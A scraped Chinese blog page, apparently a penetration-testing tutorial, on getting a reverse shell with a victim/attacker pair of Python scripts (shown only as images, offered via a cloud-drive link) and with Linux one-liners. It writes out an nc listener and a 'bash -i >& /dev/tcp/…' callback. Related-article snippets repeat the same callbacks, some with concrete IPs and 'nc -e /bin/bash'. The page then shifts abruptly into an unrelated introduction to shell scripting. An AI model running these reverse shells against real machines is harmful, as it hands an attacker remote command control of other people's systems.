csh shell_Python 实现反弹shell

最新推荐文章于 2024-05-15 21:26:16 发布
最新推荐文章于 2024-05-15 21:26:16 发布
阅读量247 收藏 1
点赞数
文章标签: csh shell python实现k-shell复杂网络 shell脚本 Linux 登录不同服务器执行命令

这里我们用到两个python文件,一个受害端,一个攻击端受害端:victim.py攻击端:attack.py网盘地址链接:pan.baidu.com/s/1XFa-JVQnL-Bd0LJ22w2vdw提取码:58pw

victim.py

e171cc81ef36ea0f63bdd3fa2c7a6406.png

attack.py

21ec6ffff26c33107d95df82dff02760.png

在受害端的电脑运行victim.py

3328b2495e222edecd59e083a3bab5ea.png

在攻击端的电脑运行attack.py,会反弹一个shell回来,可以直接执行命令

14455a02a84bd44d59fe3167b69db3e1.png

d02573b48ee4b4f7cde84238974869ff.png

680344f7a2a084db066b95efbf3c5b1b.png

9f0c4edc681005fc948172e34bc0b9b1.png

Linux下实现反弹shell

在A机器上用nc监听端口(需要安装nc)

nc -lvvp 8888

在B机器上去连接A机器(需要安装bash)

 bash -i >& /dev/tcp/A的ip/A的端口 0>&1

Shell 脚本

Shell 脚本(shell script),是一种为 shell 编写的脚本程序。

业界所说的 shell 通常都是指 shell 脚本,但读者朋友要知道,shell 和 shell script 是两个不同的概念。

由于习惯的原因,简洁起见,本文出现的 "shell编程" 都是指 shell 脚本编程,不是指开发 shell 自身。

Shell 环境

Shell 编程跟 JavaScript、php 编程一样,只要有一个能编写代码的文本编辑器和一个能解释执行的脚本解释器就可以了。

Linux 的 Shell 种类众多,常见的有:

  • Bourne Shell(/usr/bin/sh或/bin/sh)

  • Bourne Again Shell(/bin/bash)

  • C Shell(/usr/bin/csh)

  • K Shell(/usr/bin/ksh)

  • Shell for Root(/sbin/sh)

weixin_39902184
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
python反弹shell_反弹Shell小结
weixin_34979632的博客
01-15 6648
1、NC反弹shell1.1、正向反弹shell服务器nc -lvvp 7777 -e /bin/bash攻击机nc server-ip 77771.2、反向反弹shell攻击机nc -lvvp 7777服务器nc -e /bin/bash Client-ip 77771.3、不带-e反弹:2、 bash反弹shell2.1 bash -i攻击机nc -lvvp 7777服务器bash -i &...
python反弹shell_反弹shell的几种方式总结
weixin_34653651的博客
01-15 4345
假设本机地址10.10.10.11,监听端口443。1、Bash环境下反弹TCP协议shell首先在本地监听TCP协议443端口nc-lvp443然后在靶机上执行如下命令:bash-i>&/dev/tcp/10.10.10.11/4430>&1/bin/bash-i>/dev/tcp/10.10.10.11/4430&1exec5&l...
Shell: sh,bash,csh,tcshshell的区别(转)
weixin_42525096的博客
06-29 517
转载自:http://zhidao.baidu.com/question/493376840.html, http://blog.sina.com.cn/s/blog_71261a2d0100wmbj.html 谢谢! 1.Shell脚本 有那些类型 比如说 .csh . py .sh 这些脚本又有什么区别 通常写一个shell脚本都要在第一行注明使用什么...
python 反弹shell 交互
qq_32851223的博客
11-14 1107
本篇介绍解决如下问题的python脚本:漏洞利用,监听攻击机的端口拿到反弹shell,利用反弹shell进行横向的信息探索。
【学习笔记】反弹shell命令学习笔记,实战指南,1v1攻击测试教学,常用的反弹shell命令: bash -i >& /dev/tcp/vps的ip/vps的端口 0>&1
qq_37092496的博客
03-15 9019
文章目录 前言 为何给靶机发送这条执行命令就会自动连接到本地计算机,并且出发实时通讯机制(ps:有点类似oicq,前生就是用的这种模式开发的即时通讯) 作为渗透测试人员必备技能,反弹shell到底是什么原理,以及如何使用,本文是自己学习shell命令时的个人感悟和笔记,文章内容大量引入了较为官方的语言,给入门渗透学习的人员提供一个参考1 常用的反弹shell命令: bash -i >& /dev/tcp/vps的ip/vps的端口 0>&1 何为shell Shell 脚本
[CTF]反弹shell总结
cosmoslin的博客
11-11 4445
1 什么是反弹shell reverse shell,就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 2 为什么要反弹shell 正向连接 假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。
各种shell反弹方法
weixin_46626737的博客
05-16 2650
s.connect(("攻击ip",port));再在目标机器执行bash -i > &/dev/tcp/攻击ip/端口 0>&1。post方式,ip=?2.使用nc进行反弹shell。6.使用php反弹shell
shell脚本中执行python脚本并接收其返回值的例子
09-15
通过这种方式,我们可以根据Python脚本的返回值在Shell脚本实现更复杂的逻辑控制,例如错误处理、条件分支、循环等。这种能力使得Shell脚本可以作为协调多个Python脚本或其他程序的中心控制器,灵活地处理不同的...
Shell_Hacking.pdf
01-02
Shell脚本可以跨平台运行,如sh/bash/csh/zsh,并且可以在各种Unix、BSD、Solaris和Linux系统上工作。由于存在数百种开源工具,因此仅使用Shell脚本就能实现许多功能。 Bash Rootkit是一种轻量级的Rootkit,利用...
pypsi:Python可插拔Shell接口
05-02
Python Pluggable Shell Interface或pypsi是一个框架,用于开发基于命令行的Shell接口,类似于bashcsh。 它旨在替代内置的Python cmd模块。 Pypsi针对大型和快速原型接口外壳。 引导代码非常少,样板非常少。 ...
Linux Shell 脚本编程 100 例
10-30
常见的Shell有Bash(Bourne-Again SHell)、ShCsh和Zsh等。Bash是目前最常用的一种,它扩展了Sh的功能,并且兼容大多数Sh脚本。 在编写Shell脚本时,首先要了解基础语法,例如: 1. **Shebang**:脚本开头的`#!/...
Shell实现“多线程”执行脚本文件完美解决方案
09-15
在传统的Shell环境中,如BashCsh,我们通常会利用"&"符号将命令放入后台执行,但这种方法无法很好地控制多线程执行,因为无法得知各个后台进程的执行状态。本文提供了一个完美的解决方案,能够有效地管理和调度多...
Python 渗透测试:反弹 shell反弹 后门 || 程序免杀)
网络安全领域___专研者.
05-15 2117
反弹 shell (Reverse Shell) 是一种常见的渗透测试技术,它指的是受害者主机主动连接攻击者的主机,从而让攻击者获得对受害者主机的控制权。在一个典型的反弹 shell 攻击中,攻击者会在自己的主机上监听一个特定的端口,然后诱使目标主机主动连接到这个端口。当目标主机与攻击者的主机建立连接后,攻击者就可以通过这个连接获得目标主机的 shell 访问权限,从而进行进一步的渗透和控制。
python反弹shell
weixin_42576467的博客
01-07 687
你是想问 Python 如何实现反弹 shell 吗? 反弹 shell 是一种通过远程连接获取受害者计算机的 shell 权限的攻击技术。 使用 Python 反弹 shell 的方法如下: 首先,在本地计算机上运行一个监听程序,等待连接。 然后,在受害者计算机上运行一个 Python 脚本,该脚本将连接到本地计算机的监听程序。 当连接建立后,就可以通过本地计算机上的 shell 命令控制...
Python获取bash反弹shell,并与bash交互
Locosomnus的博客
10-22 237
利用python获取来自bash反弹shell
反弹Shell升级为交互式Shel
weixin_46622976的博客
04-27 1437
前言 经常我们拿到的shell是一个简单的shell 如何把一个简单的shell就升级到一个标准交互式shell 写这篇文章记录一下 正文 攻击机:kali 靶机:ubuntu 普通Shell 给kali弹shell bash -i >& /dev/tcp/192.168.145.128/4444 0>&1 kali:nc -lvvp 4444 然后发现这个shell有很多问题 无法使用vim等文本编辑器 不能补全 不能su 没有向上箭头使用历史 等等 .
常用反弹 shell 方式总结
未完成的歌~的博客
03-07 5570
反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。
简单变量赋值:tcl,cshpython的区别
weixin_52822919的博客
03-08 713
tcl, csh, python
JavaScript练手项目.zip
最新发布
08-15
项目工程资源经过严格测试可直接运行成功且功能正常的情况才上传,可轻松copy复刻,拿到资料包后可轻松复现出一样的项目,本人系统开发经验充足(全栈开发),有任何使用问题欢迎随时与我联系,我会及时为您解惑,提供帮助 【资源内容】:项目具体内容可查看/点击本页面下方的*资源详情*,包含完整源码+工程文件+说明(若有)等。【若无积分,此资源可私信获取】 【本人专注IT领域】:有任何使用问题欢迎随时与我联系,我会及时解答,第一时间为您提供帮助 【附带帮助】:若还需要相关开发工具、学习资料等,我会提供帮助,提供资料,鼓励学习进步 【适合场景】:相关项目设计中,皆可应用在项目开发、毕业设计、课程设计、期末/期中/大作业、工程实训、大创等学科竞赛比赛、初期项目立项、学习/练手等方面中 可借鉴此优质项目实现复刻,也可基于此项目来扩展开发出更多功能 #注 1. 本资源仅用于开源学习和技术交流。不可商用等,一切后果由使用者承担 2. 部分字体及插图等来自网络,若是侵权请联系删除,本人不对所涉及的版权问题或内容负法律责任。收取的费用仅用于收集和整理资料耗费时间的酬劳
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值